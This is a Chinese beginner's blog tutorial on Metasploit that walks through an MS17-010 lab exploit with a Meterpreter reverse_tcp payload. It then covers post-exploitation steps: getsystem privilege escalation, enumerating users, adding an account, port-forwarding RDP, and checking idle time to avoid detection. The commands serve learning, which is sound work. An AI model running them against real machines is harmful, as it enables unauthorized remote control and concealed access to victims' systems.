MSF入门-各模块之间的简单配合

admin 2021年12月24日07:31:12评论168 views字数 2040阅读6分48秒阅读模式

MSF入门-各模块之间的简单配合
前排群友招亲,都是帅哥
MSF入门-各模块之间的简单配合

0x00 起因
学习是一件悲伤的事情,它代表着你还是菜的。鲁迅说过:行有不得者,皆反求诸己。因此我在web漏洞复现遇到了困难的时候,选择先来搞一下内网入门。


MSF入门-各模块之间的简单配合

0x01 MSF各个模块

Msf模块总体介绍

辅助模块(Aux):扫描、发掘漏洞、探测信息等工作

渗透攻击模块(exploits):利用已发现的漏洞对远程目标系统进行攻击,植入并运行攻击载荷,从而控制目标系统

后渗透攻击模块(post):先拿下一个无关紧要的目标(A)来攻击真正的目标(B),A中来执行真正的渗透攻击攻击载荷模块(payloads):大佬说的没看懂:在渗透攻击触发漏洞后劫持程序执行流程并跳入的这段代码空指令模块(nops

编码器模块(encoders


模块之间的使用大概如下:

1、发现一个目标

2、用辅助模块对目标进行扫描,发现漏洞

3、使用对应的渗透攻击模块,然后选择对应的攻击载荷模块,攻击执行成功后会使用到这个,然后得到一个会话

4、会话是目标机器返回的,因此可以在会话里面使用后渗透攻击模块,通过目标机器去攻击另外一台机器


空指令模块,没有使用过,暂时不清楚,编码器模块,也许我使用过,在生成msf shell的时候,有编码功能


目标:做一个实验,在流程上面使用一遍这些模块
通过ms17-010进行实验,扫描漏洞-攻击-攻击采用的方式-攻击成功后可以使用的命令

MSF入门-各模块之间的简单配合

0x02 MS17-010复现
环境是我在另外的环境已经搭好的,在后面另外一篇文章会说

1、看一下相关漏洞的模块

发现有两个模块。一个是探测漏洞,一个攻击漏洞

    search ms17_010


MSF入门-各模块之间的简单配合


2、先探测一波漏洞是否存在

Use 1

set rhosts 192.168.100.0/24

Show options看看

Exploit执行

发现漏洞主机


MSF入门-各模块之间的简单配合


3、选择攻击模块

  IP变了是因为我中间停了一下

选择了payloadset payload windows/x64/meterpreter/reverse_tcp

然后设置目标机器,监听机器、监听端口

Run


MSF入门-各模块之间的简单配合

MSF入门-各模块之间的简单配合


攻击成功,获得了一个metpreter会话




MSF入门-各模块之间的简单配合

0x02 metpreter使用

这里通过ms17-010获得了一台windowsshell,接着通过这个shell进行msf的学习。同理我们可以通过webshell上传msf shell上去执行,然后在监听。

这个shell也就是merpreter会话。

merpreter有以下几种命令:

基本命令、文件系统命令、网络命令、系统命令、用户接口命令


1、基本命令

Background命令:退出当前会话,返回msf,会话隐藏在后台

Session命令:查找拥有的session,比如我们上面执行background后隐藏的会话

Quit命令:关闭当前会话

Shell命令:获取目标系统的控制台shell,exit退出


MSF入门-各模块之间的简单配合

MSF入门-各模块之间的简单配合


2、文件系统命令

Cat命令:查看文件内容


MSF入门-各模块之间的简单配合

Getxx:获取一些信息命令

MSF入门-各模块之间的简单配合


Upload:上传命令

Download:下载命令,将上面的命令的参数转换位置即可 


MSF入门-各模块之间的简单配合


Edit:编辑命令,可以看到这个bbb.txt的文件被我们修改了


MSF入门-各模块之间的简单配合

Search:命令,查找相关文件


MSF入门-各模块之间的简单配合


3、网络命令

Ipconfig

route查看本机路由


MSF入门-各模块之间的简单配合


4、系统命令

Ps:获取系统进程信息


MSF入门-各模块之间的简单配合


Migration:merpreter会话转移到另外一个进程的内存空间


MSF入门-各模块之间的简单配合

Execute:在目标主机上面执行文件


MSF入门-各模块之间的简单配合


Getuid:获取当前用户信息

Getsystemmeterpreter内置的提权命令



MSF入门-各模块之间的简单配合

0x03 MSF后渗透模块

Msf提供了一些可以直接在merpreter中可以直接使用的模块


Post模块也就是后渗透模块

可以直接查看有哪些,然后按需使用


MSF入门-各模块之间的简单配合


1、查看目标主机安装了哪些应用

Run post/windows/gather/enum_applications


MSF入门-各模块之间的简单配合

2、查看目标主机存在的用户

Run post/windows/gather/enum_logged_on_users


MSF入门-各模块之间的简单配合


3、添加用户(会添加到管理员权限失败)

Run getgui -u hacklww -p qwe123!@#


MSF入门-各模块之间的简单配合


运行shell命令进行修改


MSF入门-各模块之间的简单配合


4、使用我们添加的新用户或者获得的用户账号密码进行远程登录


MSF入门-各模块之间的简单配合

MSF入门-各模块之间的简单配合

所以登录之前要先使用idletime命令查看空闲时长,避免让对方察觉。


5、portfwd:端口转发

将目标的3389端口转发我们主机的7777端口,访问我们本地的7777即为目标3389


MSF入门-各模块之间的简单配合

MSF入门-各模块之间的简单配合


暂时到这,下一篇内网学习-信息收集见

MSF入门-各模块之间的简单配合
0x04 总结
1、如果有什么不知道的,比如漏洞aaa,你不清楚在msf里面怎么使用,不要犹豫:search aaa
2、如果有命令不清楚怎么用的,不要犹豫,-help,某个大佬说过,多用help
3、如果以上两个你觉得没什么用的,不要犹豫,加入我们的群找我,我和你一起百度
MSF入门-各模块之间的简单配合
0x05 other 其他 
如您有任何问题、建议、需求请后台留言NOVASEC公众号
团队初创,热烈希望现在以及未来的大佬们能够投稿支持!

MSF入门-各模块之间的简单配合


本文始发于微信公众号(NOVASEC):MSF入门-各模块之间的简单配合

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月24日07:31:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSF入门-各模块之间的简单配合http://cn-sec.com/archives/494973.html

发表评论

匿名网友 填写信息